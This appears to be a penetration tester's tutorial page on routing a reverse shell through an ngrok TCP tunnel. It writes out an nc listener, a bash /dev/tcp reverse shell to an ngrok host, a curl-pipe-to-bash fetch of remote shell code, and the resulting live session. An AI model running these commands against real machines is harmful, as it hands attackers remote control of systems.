# ngrok ## Overview * [ngrok](https://ngrok.com/) is a pretty sweet solution for a secure ingress gateway for your apps, services, and APIs. Check [the docs](https://ngrok.com/use-cases) to see its use cases * With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL * There are methods to build authentication or allowlisting around this but they're not part of the free tier ### Registration * After signing up for a free ngrok account, follow the [setup instructions](https://dashboard.ngrok.com/get-started/setup/linux) to get ngrok set up on your machine *** ## Example - Reverse Shell ### Ngrok and local listener setup * On your machine run a command to capture TCP traffic {% code overflow="wrap" %} ```bash ngrok tcp 1337 ``` {% endcode %} * This will provide you with a free forwarding address (you can also set up a custom domain) {% code overflow="wrap" %} ```bash ngrok Policy Management Examples http://ngrok.com/apigwexamples Session Status online Account cal (Plan: Free) Version 3.18.2 Region United States (California) (us-cal-1) Web Interface http://127.0.0.1:4040 Forwarding tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337 Connections ttl opn rt1 rt5 p50 p90 0 0 0.00 0.00 0.00 0.00 ``` {% endcode %} * You will need a way to catch incoming connections, we can use `nc` for this like so: {% code overflow="wrap" %} ```bash nc -nvlp 1337 ``` {% endcode %} ### Reverse shell setup and execution * On a different machine, execute a reverse shell and the traffic should be sent to your machine * Check out [pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and [revshells](https://www.revshells.com/) for additional reverse shell options {% code overflow="wrap" %} ```bash bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1' ``` {% endcode %} * Tip - If you're running a bash reverse shell, ensure the current shell is bash, or you'll get an error like the one below. Otherwise, you can specifically call on bash using the command above from any shell so long as bash is installed {% code overflow="wrap" %} ``` zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 ``` {% endcode %} * Another option is to use [reverse-shell.sh](https://reverse-shell.sh/) which acts as a reverse shell as a service * You can go to this URL directly in your browser and see the script that would execute {% code overflow="wrap" %} ```bash curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash ``` {% endcode %} * Once the shell has successfully executed, you should see it in your listener e.g., `nc` {% code overflow="wrap" %} ```bash nc -nvlp 1337 listening on [any] 1337 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240 bash: no job control in this shell The default interactive shell is now zsh. To update your account to use zsh, please run `chsh -s /bin/zsh`. For more details, please visit https://support.apple.com/kb/HT208050. bash-3.2$ whoami tyler bash-3.2$ hostname TylerMBP.local bash-3.2$ ``` {% endcode %}